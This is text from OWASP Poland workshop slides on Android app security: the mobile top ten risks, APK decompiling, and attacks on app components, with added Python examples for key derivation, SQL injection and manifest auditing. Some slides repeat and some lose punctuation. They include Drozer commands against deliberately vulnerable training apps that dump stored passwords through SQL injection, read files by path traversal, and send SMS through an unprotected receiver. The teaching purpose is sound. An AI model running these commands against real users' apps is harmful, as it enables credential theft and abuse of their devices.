Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example a Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• Few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
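What "use password-based encryption instead" of a stored or hardcoded key looks like, as an added example that is not from the slides: the key that protects the database is derived with PBKDF2-HMAC-SHA256 from the user's password and a random salt; only the salt, the iteration count and an HMAC verifier are persisted, so nothing on the device (and nothing in the decompiled code) yields the key without the password. The function names and the iteration count are assumptions of this example, not parameters recommended by the workshop.

```python
import hashlib
import hmac
import json
import secrets

KDF_ITERATIONS = 200_000   # assumption: tune to the device; more iterations = slower guessing
KEY_LEN = 32               # 256-bit key


def derive_key(password, salt, iterations=KDF_ITERATIONS):
    """PBKDF2-HMAC-SHA256: same password + same salt -> same key; anything else -> a different key."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=KEY_LEN)


def _verifier(key):
    # Lets the app distinguish 'wrong password' from 'corrupt data' without storing the key.
    return hmac.new(key, b"kdf-verifier", "sha256").hexdigest()


def new_key_material(password):
    """First use: pick a random salt, derive the key, return (key, params to persist).
    The params contain the salt, iteration count and verifier; never the key or password."""
    salt = secrets.token_bytes(16)
    key = derive_key(password, salt)
    params = {"salt": salt.hex(), "iterations": KDF_ITERATIONS, "verifier": _verifier(key)}
    return key, json.dumps(params)


def unlock(password, stored_params):
    """Later launches: re-derive from the stored salt and check the verifier in constant time.
    Returns the key, or None if the password is wrong."""
    params = json.loads(stored_params)
    key = derive_key(password, bytes.fromhex(params["salt"]), params["iterations"])
    if not hmac.compare_digest(_verifier(key), params["verifier"]):
        return None
    return key
```

The derived key is handed to whatever database encryption layer is in use (SQLCipher, as named under M2) and lives only in memory; when the user locks the app, dropping the key is enough, because it can be rebuilt from the password and the stored salt at any time.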
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
– Other application via intent/content provider
– Shared file
– Server response
– Third party website
Client side injection – what to inject
• SQL injection to local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running a new activity, etc.) via special objects called Intents
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows for remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
– Isolation
– Privilege separation
• How sensitive data is transmitted
– Extra-device communication
– Inter-application communication
– Inter-component communication
Android Application Components
(Diagram of the four component types: Activities, Services, Content providers, Broadcast receivers)
Android Application Components
AndroidManifest.xml defines the way the app works and what kind of interaction between its components and the outside world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
<uses-permission android:name="string" />
<permission android:protectionLevel="…" />
• Components and their attributes
(Screenshot: AndroidManifest.xml)
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
Example components attributes (screenshot of the attributes for Activities, Services, Content providers and Broadcast receivers)
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested action/data.
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;

// Explicit intent: the target component is named, so only com.android.browser receives it
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse("http://www.google.com"));
String pack = "com.android.browser";
ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
intent.setComponent(comp);
startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC – the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer
Is installed in the default package of AppUse. Use it with adb, so just "click-and-play" is enough.
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it is possible to achieve the following:
– Modify data in the background
– Trick the user
– Leak sensitive information
Activities
Activity components attacks
• General hijacking scheme
• Results of an attack:
– A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
– Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
(Diagram of the hijacking scheme: apps A, B and E)
Activities
Activity components attacks
• List and launch exported activities
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction: it must be exported, or respond to/accept input from message formats like intents, files or the network stack.
Services
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat running to check for sensitive info
• Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
Content providers
• What info can they hold?
– User's phone numbers
– Passwords
– SMS
• And one of the main problems is, again, permissions
run app.provider.info --permission null
Content providers
Content providers attacks
• Unrestricted access to app database
– Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
Content providers
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
bull SQL injection
Content providers
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
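Why the two Sieve queries above behave as they do, and what a provider's query() should do instead, as an added example (not Sieve's or drozer's code): a stand-in for a content provider's query() over an in-memory SQLite database; the Passwords and Key table names follow the drozer output above, the rows and columns are constructed for this example.

```python
"""Added example: a content-provider style query() built the vulnerable way and
the safe way, over an in-memory SQLite database with constructed sample rows."""
import sqlite3

# Columns a caller may ask for; the password column is deliberately not listed
ALLOWED_COLUMNS = ("_id", "service", "username", "email")


def make_db():
    """Constructed stand-in for the app's database (not Sieve's real schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT,
                               username TEXT, password BLOB, email TEXT);
        CREATE TABLE Key(Password TEXT, pin TEXT);
        INSERT INTO Passwords(service, username, password, email)
            VALUES ('mail', 'alice', X'DEADBEEF', 'alice@example.test');
        INSERT INTO Key VALUES ('thisismypassword', '9876');
    """)
    return con


def query_vulnerable(con, projection, selection, selection_args=()):
    """Mirrors a provider that hands the caller's projection and selection
    strings straight to the query builder: both become raw SQL text."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM Passwords" % cols
    if selection:
        sql += " WHERE (%s)" % selection
    return con.execute(sql, tuple(selection_args)).fetchall()


def try_vulnerable(con, projection, selection):
    """Run query_vulnerable and report either the rows or the SQLite error text,
    which is what drozer prints back from the provider."""
    try:
        return ("rows", query_vulnerable(con, projection, selection))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def query_safe(con, projection, service):
    """The hardened form: projection columns are checked against an allowlist
    and the only caller-controlled filter value is bound with a '?' placeholder,
    so it can never change the shape of the statement."""
    cols = list(projection) if projection else list(ALLOWED_COLUMNS)
    unknown = [c for c in cols if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError("unknown column(s): %s" % unknown)
    sql = "SELECT %s FROM Passwords WHERE service = ?" % ", ".join(cols)
    return con.execute(sql, (service,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The two drozer probes from the slide, replayed against the vulnerable query()
    print(try_vulnerable(db, None, "'"))               # unrecognized token error
    print(try_vulnerable(db, ["* FROM Key--"], None))   # rows from the Key table
    # The same kind of input against the hardened query()
    print(query_safe(db, ["username", "email"], "mail"))
    print(query_safe(db, ["username"], "' OR 1=1--"))  # no rows: bound as a literal
```

A provider that must accept caller-supplied selection strings on API 28 and later can additionally enable SQLiteQueryBuilder.setStrict(true) so the builder rejects such tokens; on older targets the allowlist and bound parameters above are what remains.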
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plugged in, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send an intent and enjoy
Broadcast receivers
Broadcast receivers attacks
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
  <intent-filter>
    <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
  </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
// GoatDroid's receiver as shown on the slide: it sends an SMS built from whatever
// extras arrive in the broadcast, without checking who sent it
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
The above is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action.
Broadcast receivers
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only code running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
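A static check that applies the defenses above to a manifest, as an added example (not from the workshop or from any of the projects named on these slides): it parses a constructed AndroidManifest.xml, applies the exported rule (an explicit android:exported wins, otherwise an intent-filter makes the component reachable from other apps) and reports exported components with no android:permission, components guarded only by a normal-level custom permission, and a debuggable application. The package, permission and component names in the sample are made up, modelled on the GoatDroid receiver and the Sieve activities shown earlier.

```python
"""Added example (not from the workshop): a static audit of AndroidManifest.xml
for the exported / permission / debuggable attributes discussed above."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "provider", "receiver")
WEAK_LEVELS = ("normal", "dangerous")  # any app can request these

# Constructed sample manifest; names are made up for this example
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.example.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <permission android:name="org.example.fourgoats.SOCIAL"
              android:protectionLevel="normal" />
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true" />
    <activity android:name=".FileSelectActivity" android:exported="false" />
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver">
      <intent-filter>
        <action android:name="org.example.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <receiver android:name=".broadcastreceivers.GuardedReceiver"
              android:permission="org.example.fourgoats.SOCIAL">
      <intent-filter>
        <action android:name="org.example.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <provider android:name=".DBContentProvider"
              android:authorities="org.example.fourgoats.DBContentProvider" />
  </application>
</manifest>
"""


def attr(elem, name):
    """Read an android:-namespaced attribute, or None when it is not set."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """The manifest rule: an explicit android:exported wins; otherwise a
    component with an <intent-filter> is reachable from other apps and one
    without is not. A provider with the attribute unset is treated as exported
    (the pre-API-17 default), which is the conservative assumption here."""
    explicit = attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return True
    return component.find("intent-filter") is not None


def is_launcher(component):
    """The MAIN/LAUNCHER activity has to be reachable; do not report it."""
    return component.tag == "activity" and any(
        attr(action, "name") == "android.intent.action.MAIN"
        for action in component.iter("action"))


def audit_manifest(xml_text):
    """Return (severity, subject, message) findings for one manifest."""
    root = ET.fromstring(xml_text.strip())
    findings = []
    weak_perms = {}
    for perm in root.findall("permission"):
        name = attr(perm, "name")
        level = attr(perm, "protectionLevel") or "normal"
        if level in WEAK_LEVELS:
            weak_perms[name] = level
            findings.append(("medium", name,
                             "custom permission with protectionLevel=%s" % level))
    app = root.find("application")
    if app is None:
        return findings
    if (attr(app, "debuggable") or "").lower() == "true":
        findings.append(("high", "application", 'android:debuggable="true"'))
    for comp in app:
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp) or is_launcher(comp):
            continue
        name, guard = attr(comp, "name"), attr(comp, "permission")
        if guard is None:
            findings.append(("high", name,
                             "exported %s without android:permission" % comp.tag))
        elif guard in weak_perms:
            findings.append(("medium", name, "exported %s guarded only by %s-level permission %s"
                             % (comp.tag, weak_perms[guard], guard)))
        else:
            findings.append(("info", name, "exported %s guarded by %s" % (comp.tag, guard)))
    return findings


if __name__ == "__main__":
    for severity, subject, message in audit_manifest(SAMPLE_MANIFEST):
        print("%-6s %-45s %s" % (severity, subject, message))
```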
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– Plain text configuration files
– Cookie stores
– SD card
Insecure data storage ndash how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze the package files at different stages
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
– Using known weak cipher versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection- how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid: mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain)
sslyze --regular www.example.com:443
Insufficient transport layer protection- example
Insufficient transport layer protection - a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer
dz> run scanner.provider.finduris -a <package_name>
• Use logcat to verify what is being logged, using ADB: adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
– Another application, via an intent/content provider
– A shared file
– A server response
– A third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents
// Two implicit intents: only the action is named, the system picks the component
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
